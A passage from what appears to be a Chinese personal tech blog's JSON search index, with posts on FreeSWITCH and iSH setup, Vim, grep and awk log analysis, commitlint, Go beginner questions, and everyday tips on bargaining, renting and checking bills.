./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html\n","permalink":"https://wdd.js.org/posts/2020/11/gtrrng/","summary":"1. 
将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html","title":"树莓派安装fs 1.10"},{"content":"为了能够在所有环境达到一致且极致的编程体验,我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vscode慢了很多。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。\n","permalink":"https://wdd.js.org/vim/from-vscode-to-vim/","summary":"为了能够在所有环境达到一致且极致的编程体验,我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发,用了一段时间后,我发现开发速度相比于vscode慢了很多。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。","title":"从VSCode切换到VIM"},{"content":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 
可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。\nstep7: vim写个hello world吧 vim index.html\nstep8: 监听端口可以吗? 写web服务器就不赘述了,直接用python自带的静态文件服务器吧。\npython3 -m http.server 这会打开一个静态文件服务器,监听在8000端口。\n我们打开自带的safari浏览器看看,能否访问这个页面。\nhello world出现。完美!!!\nstep9: 后台运行 后台运行的思路是:\n使用tmux 创建一个新的session 在这个session中执行下面的命令。下面的命令实际上是获取你的位置信息,当App切到后台时,位置在后台刷新,保证ish能够后台运行。当然这需要给予位置权限。你也可以手动输入 cat /dev/location 看看会发生什么。 cat /dev/location \u0026gt; /dev/null \u0026amp; FAQ 有些人会问,ish不支持多标签页,怎么同时做很多事情呢? 
问这个问题,说明你还没用过tmux这个工具,建议你先学学tmux。 ","permalink":"https://wdd.js.org/posts/2020/11/kfl9zd/","summary":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。","title":"在iPhone iPad上搭建Linux本地开发环境"},{"content":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","permalink":"https://wdd.js.org/posts/2020/10/sxuez4/","summary":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","title":"tar打包小技巧: 替换根目录"},{"content":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 
,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出卖家的底价,高于这个底价,卖家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","permalink":"https://wdd.js.org/posts/2020/10/ahtqix/","summary":"只要有价格,就可以讲价 ****只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。 有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才有留够上涨的空间 **50%理论 ,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策。提高价格,这里最重要的是摸出卖家的底价,高于这个底价,卖家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","title":"讲价的学问"},{"content":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 file2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以指定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.log 12:14 WARNING:db:1 bad message 12:14 WARNING:db:21 bad message 12:14 WARNING:db:2 bad message1 12:14 WARNING:db:4 bad message 仅输出匹配字段 grep -o args 使用-o参数,可以仅仅输出匹配项,而不是整个匹配的行 ➜ go-tour grep -o -E \u0026#34;db:\\d+ \u0026#34; a.log db:1 db:21 db:2 db:4 统计关键词出现的行数 例如一个nginx的access.log, 我们想统计其中的POST的个数,和OPTIONS的个数。\n先写一个脚本,名为method.awk\nBEGIN{ post_lines = 0 options_lines = 0 printf \u0026#34;start\\n\u0026#34; } /POST/ { post_lines++ } /OPTIONS/ { options_lines++ } END { printf \u0026#34;post_lines: %s, \\noptions_lines: %s \\n\u0026#34;,post_lines,options_lines } 然后执行\nawk -f method.awk access.log 时间处理 比如给你一个nginx的access.log, 让你按照每秒,每分钟统计下请求量的大小,如何做呢?\n首先取出日志行中的时间,然后从时间中取出秒 awk '{print $4}' 10.32.104.47 - - [29/Sep/2020:06:43:53 +0800] \u0026#34;OPTIONS url HTTP/1.1\u0026#34; 200 0 \u0026#34;\u0026#34; \u0026#34;Mozi 
Safari/537.36\u0026#34; \u0026#34;-\u0026#34; awk \u0026#39;{print $4}\u0026#39; access.log [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 那如何取出分钟呢?使用awk的字符串函数, substr(str, startIndex, len) awk \u0026#39;{print substr($4,0,18)}\u0026#39; access.log [29/Sep/2020:05:23 [29/Sep/2020:05:23 对输出结果进行 uniq -c 统计出现重复行的次数。即单位时间内时间重复的次数,也就是单位时间内的请求数。\n625 [29/Sep/2020:06:36 625 [29/Sep/2020:06:37 624 [29/Sep/2020:06:38 624 [29/Sep/2020:06:39 651 [29/Sep/2020:06:40 626 [29/Sep/2020:06:41 624 [29/Sep/2020:06:42 560 [29/Sep/2020:06:43 排序与去重 sort 按照某一列去重 按照多列去重 vim专项练习 :set nowrap 取消自动换行 :set nu 显示行号 :%!awk '{$2=\u0026quot;\u0026quot;;print $0}' 删除指定的列 :%!awk '{print $3,$4}' 挑选指定的列 :g/key/d 删除匹配的行 :v/key/d 删除不匹配的行 :g/key/p 仅仅显示匹配的行 :v/key/p 仅仅显示不匹配的行 /key1\\|key2 查找多个关键词 :nohl 移除高亮 核武器 lnav 过滤 统计图 select cs_method , count( cs_method ) FROM access_log group by cs_method ","permalink":"https://wdd.js.org/posts/2020/04/qlqhiv/","summary":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 file2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以指定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.","title":"[todo]锋利的linux日志分析命令"},{"content":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有它们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 
如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf\n","permalink":"https://wdd.js.org/posts/2020/09/thg9yu/","summary":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有它们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is runing and Flash policy file is correct placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf","title":"flash_player_admin_guide"},{"content":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续集成工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.18.3) ⧗ input: 00 ✖ subject may not be empty [subject-empty] ✖ type may not be empty [type-empty] ✖ found 2 problems, 0 warnings ⓘ Get help: https://github.com/conventional-changelog/commitlint/#what-is-commitlint 根据commitlog生成changelog 下面命令中的1.5.5 1.5.10可以是两个tag, 也可以是两个分支。\ngit log 可以提取两个点之间的commitlog, 使用\u0026hellip;\ngit log --pretty=format:\u0026#34;[%h] %s (%an)\u0026#34; 1.5.5...1.5.10 | sort -k2,2 \u0026gt; changelog.md 参考 https://github.com/conventional-changelog/commitlint/tree/master/@commitlint/config-angular 
https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html ","permalink":"https://wdd.js.org/posts/2020/09/vu0ag0/","summary":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续集成工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.","title":"使用commitlint检查git提交信息是否合规"},{"content":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的链接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.com drwxr-xr-x 3 wangdd staff 96B Sep 14 09:17 golang.org 路径在GOPATH/pkg/mod 目录下\n4. cannot find module providing package github.com 在项目根目录执行\ngo mod init module_name 5. 
选择什么Web框架 fiber 如果你要写一个web服务器,最快速的方式是挑选一个熟悉的框架。 如果你熟悉Node.js中的express框架,那你会非常快速的上手fiber,因为fiber就是参考express做的。\nhttps://github.com/gofiber/fiber\n6. 自动构建 air npm中有个包,叫做nodemon,它会在代码变更之后,重启服务器。\n如果你需要在golang中类似的功能,可以使用https://github.com/cosmtrek/air\n7. 如何查看官方库文档 go doc fmt | less ","permalink":"https://wdd.js.org/golang/golang-start-faq/","summary":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的链接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.","title":"Golang初学者的问题"},{"content":"在上海工作的人,除了一年一次的春运,就可能就是一年一次的找房搬家了。\n找房仿佛就是一趟西天取经,要经历九九八十一难,也要和各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要仅仅打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使不能坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来说,如果转租不出去,你又确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有白纸黑字写清楚的,你都可以认为是中介和二房东在忽悠。\n","permalink":"https://wdd.js.org/posts/2020/09/xglwgs/","summary":"在上海工作的人,除了一年一次的春运,就可能就是一年一次的找房搬家了。\n找房仿佛就是一趟西天取经,要经历九九八十一难,也要和各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 
上面这些设备,不要仅仅打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使不能坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来说,如果转租不出去,你又确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有白纸黑字写清楚的,你都可以认为是中介和二房东在忽悠。","title":"租房的检查清单"},{"content":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员薅羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说道:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果你表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说道:不好意思,这个可能记的别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算器,抬头望着天空的那朵白云。仿佛在做云计算,然后说:一共38块。\nshit! 
很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被薅羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","permalink":"https://wdd.js.org/posts/2020/09/hpc6fy/","summary":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员薅羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说道:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果你表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说道:不好意思,这个可能记的别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算器,抬头望着天空的那朵白云。仿佛在做云计算,然后说:一共38块。\nshit! \n很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被薅羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","title":"如何避免被收银员坑"},{"content":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","permalink":"https://wdd.js.org/posts/2020/09/upi47f/","summary":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标shi ","title":"IO性能 Node vs PHP vs Java vs Go"},{"content":"为什么要用iPad开发? 
第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转战其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Termius连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外表比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的,有些人不知道哪里好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tmux 后记 ","permalink":"https://wdd.js.org/posts/2020/09/rzumhc/","summary":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 